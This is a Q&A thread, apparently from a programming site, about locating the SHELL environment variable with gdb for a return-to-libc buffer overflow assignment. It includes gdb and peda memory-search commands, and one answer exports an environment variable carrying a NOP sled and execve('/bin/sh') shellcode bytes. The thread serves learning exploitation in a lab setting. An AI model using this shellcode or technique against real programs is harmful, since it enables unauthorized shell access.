
I have to exploit a very simple buffer overflow in a vulnerable C++ program for an assignment and I am not able to find the environment variable SHELL.

I have never worked with BoF before, and after reading lots of similar questions, posts, etc. I have this information (correct me if it's wrong):

  • The program stores the environment variables in a global variable called environ
  • I can find the address of this variable like this:

    (gdb) info variable environ
    All variables matching regular expression "environ":
    
    Non-debugging symbols:
    0xb7fd1b00  __environ
    0xb7fd1b00  _environ
    0xb7fd1b00  environ
    
  • I need to find the /bin/bash string in that variable to launch a shell (I have already got the system and exit addresses, I only need the route to the shell). And here is where I don't know what to do. I have been reading gdb tutorials, but still nothing. x/s 0xb7fd1b00 does not output anything useful.

Palantir

4 Answers


environ is a pointer to pointer, as it has the type char **environ.

You have to try something like:

(gdb) x/s *((char **)environ)
0xbffff688:      "SSH_AGENT_PID=2107"
(gdb) x/s *((char **)environ+1)
0xbffff69b:      "SHELL=/bin/bash"
J.D.
  • That's it!! Thanks a lot :) I had managed to get the address just with `x/s environ` and TONS of "enter"s, but it wasn't very nice :P – Palantir Mar 28 '12 at 21:29
  • A lot easier to remember: x/s *environ. If you need to see multiple variables... x/5s *environ –  Jul 17 '14 at 02:47
  • I get "Cannot access memory at address ..." . Possible memory-read protection in RHEL 6 systems?? – Otheus Sep 05 '15 at 21:40
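The pointer chasing the answer above does by hand in gdb, as an added C example (not from the original post): it walks the same `environ` table in-process, shows why the address from `info variable environ` is the address of a pointer table rather than of a string, and looks up SHELL by exact name so that a longer name such as SHELLOPTS is not mistaken for it. The `find_env_*` helpers and the sample array in the test are my own names.

```c
#include <stdio.h>
#include <string.h>

/* The C runtime's environment table: an array of "NAME=value" string
 * pointers, terminated by NULL. gdb's `info variable environ` printed the
 * address of this pointer, which is why `x/s` on that address shows nothing
 * useful: the bytes there are a pointer, not text. */
extern char **environ;

/* Return the 0-based slot of the entry named `name` in an envp-style
 * array, or -1 if there is none. The slot is the N you would use in
 * `x/s *((char **)environ+N)`. A match requires the full name followed
 * by '=', so "SHELL" does not match "SHELLOPTS=...". */
int find_env_index(char *const *envp, const char *name)
{
    size_t n = strlen(name);
    for (int i = 0; envp[i] != NULL; i++) {
        if (strncmp(envp[i], name, n) == 0 && envp[i][n] == '=')
            return i;
    }
    return -1;
}

/* Return the full "NAME=value" string for `name`, or NULL if absent. */
const char *find_env_entry(char *const *envp, const char *name)
{
    int i = find_env_index(envp, name);
    return i < 0 ? NULL : envp[i];
}

/* Return just the value part after '=', or NULL if the name is absent. */
const char *find_env_value(char *const *envp, const char *name)
{
    const char *entry = find_env_entry(envp, name);
    return entry == NULL ? NULL : entry + strlen(name) + 1;
}

int main(void)
{
    /* The same three views gdb gives: the table, its first slot, then SHELL. */
    printf("environ    = %p (address of the pointer table)\n", (void *)environ);
    if (environ[0] != NULL)
        printf("environ[0] = %p -> \"%s\"\n", (void *)environ[0], environ[0]);
    int i = find_env_index(environ, "SHELL");
    if (i < 0)
        printf("SHELL is not set in this process\n");
    else
        printf("environ[%d] = %p -> \"%s\"\n", i, (void *)environ[i], environ[i]);
    return 0;
}
```

The printed addresses differ between a run under gdb and a plain run, because gdb adds its own variables to the environment and shifts the strings on the stack.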
  • Environment variables are 16 bytes from the base pointer (%ebp).
  • Put a break point in the main function and do this,

(gdb) x/wx $ebp+0x10
0xffffd3f8: 0xffffd48c
(gdb) x/wx 0xffffd48c
0xffffd48c: 0xffffd67e
(gdb) x/s 0xffffd67e
0xffffd67e: "XDG_SEAT_PATH=/org/freedesktop/DisplayManager/Seat0"
(gdb) x/wx 0xffffd48c+4
0xffffd490: 0xffffd6b2
(gdb) x/s 0xffffd6b2
0xffffd6b2: "XDG_CONFIG_DIRS=/etc/xdg/lubuntu:/etc/xdg/xdg-Lubuntu:/usr/share/upstart/xdg:/etc/xdg"

Refer to this blog.


If you have peda installed for gdb, then you could simply type this in gdb:

gdb-peda$ searchmem SHELL

The output would show

Searching for 'SHELL' in: None ranges
Found 1 results, display max 1 items:
[stack] : 0xbffff540 ("SHELL=/bin/bash")
redgetan

You can also just use "refsearch variable_name" if you have peda installed for gdb.

example:

First of all you should add variable (something like Shellcode) to environment.

(export Shellcode=$(python -c 'print "\x90"*100 +"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe1\x50\x89\xe2\xb0\x0b\xcd\x80"'))

Then open gdb with sample program, break main and run.

When the program pauses on the breakpoint, you can search for the environment address with the following command.

refsearch Shellcode

schroeder